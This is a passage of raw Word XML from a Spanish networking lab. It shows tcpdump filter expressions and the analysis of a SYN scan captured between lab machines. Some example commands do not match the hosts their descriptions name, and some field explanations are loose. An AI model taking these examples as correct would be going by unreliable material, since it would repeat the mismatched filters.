      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">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tcpdump icmp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">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TCP cuyo puerto de destino sea 80:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">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tcp dst port 80</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">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UDP cuyo puerto de origen sea 53:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">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udp src port 53</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">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IPv4 cuyo host de destino sea 192.168.1.1:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">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dst host 192.168.1.1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">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TCP cuyo host de origen sea 192.168.1.1 y cuyo host de destino sea 10.1.1.1:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">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tcp and src host 192.168.1.1 and dst host 10.1.1.1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">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TCP cuyo host de origen sea 192.168.1.1 o cuyo host de destino sea 10.10.10.250:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">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tcp and ‘(src host 192.168.1.1 or dst host 10.10.10.250)’</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">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TCP cuyo host de origen sea 10.1.1.1, el host de destino sea 192.168.1.1 y el puerto de origen sea 22:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="411.42960000000005" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:fill="b7b7b7" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tcpdump tcp and src host 192.168.1.1 and dst host 10.10.10.250 and src port 22</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Queremos capturar los paquetes TCP cuyo host de origen sea 192.168.1.1, el host de destino sea 10.10.10.250, y el puerto de destino sea 443, y el protocolo sea HTTP:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">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tcpdump tcp and src host 192.168.1.1 and dst host 10.1.1.1 and dst port 443 and http</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:color w:val="808080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Análisis de la información capturada</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">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Vamos a realizar un SYN Scan. El objetivo es analizar los paquetes generados, pero esta vez en </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tcpdump </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">en lugar de Wireshark. El escaneo lo lanzaremos desde la máquina </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">KALI </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hacia la máquina</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> con IP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.10.10.250</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Lo primero será poner en marcha </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tcpdump </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">en un terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276"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sudo tcpdump - eth0 tcp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1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114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5399730" cy="558800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="17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Con ese comando pretendemos capturar el tráfico que pase por la interfaz </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">eth0 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cuando el protocolo sea TCP. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">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Posteriormente, lanzaremos el escaneo en otro terminal. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">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171700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="16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El puerto 22 está abierto, así que tcpdump captura tres paquetes. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">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508000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="16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Si analizamos los paquetes capturados, tenemos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19"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69">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="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PAQUETE 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="ff00ff"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">20:12:45.833451</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38761d"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IP</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ff0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.222.50217</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sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="0000ff"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.10.10.250.ssh: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="e69138"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flags [S]</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351c75"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">seq 3717510172</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e06c2b"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">win 1024</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8d8dd3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">options [mss 1460</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="0000ff"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">], </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="745556"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">length 0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2"/>
        <w:tblW w:w="9105.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2475"/>
        <w:gridCol w:w="6630"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2475"/>
            <w:gridCol w:w="6630"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="1"/>
          <w:trHeight w:val="361.70078740157487" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="000000" w:space="0" w:sz="5" w:val="single"/>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bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:hanging="720"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Campo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bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:hanging="720"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Descripción</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="1"/>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D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="19" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="ff00ff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="ff00ff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Timestamp de Unix</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E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="19" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="ff00ff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">20:12:45.833451 - Indica el momento de captura del paquete </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="1"/>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F">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Protocolo</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0">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IP - Indica el protocolo de red utilizado en el paquete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="1"/>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1">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Dirección IP y puerto origen</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2">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10.10.10.222, puerto 50217 - Dirección IP y puerto del host de origen que envió el paquete</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3">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Dirección IP y puerto destino</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4">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10.10.10.250, puerto ssh - Dirección IP y puerto del host de destino al que se envió el paquete</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5">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Flags ***</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6">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[S]. Flag SYN activado</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7">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Número de secuencia</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8">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3717510172</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9">
            <w:pPr>
              <w:widowControl w:val="0"/>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Número ACK</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A">
            <w:pPr>
              <w:widowControl w:val="0"/>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No presente - Este paquete es un paquete SYN  y no incluye información de acuse de recibo</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B">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Tamaño de la ventana</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C">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1024 - Indica el número de bytes que el host de destino está dispuesto a recibir</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D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:hanging="720"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="8d8dd3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="8d8dd3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Opciones del paquete</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E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:hanging="720"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="8d8dd3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="8d8dd3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">[mss 1460] - Especifica el tamaño máximo de segmento de la conexión</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="361.7007874015748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F">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Tamaño del paquete</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0">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0 - Indica el tamaño del paquete en bytes, en este caso no contiene datos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
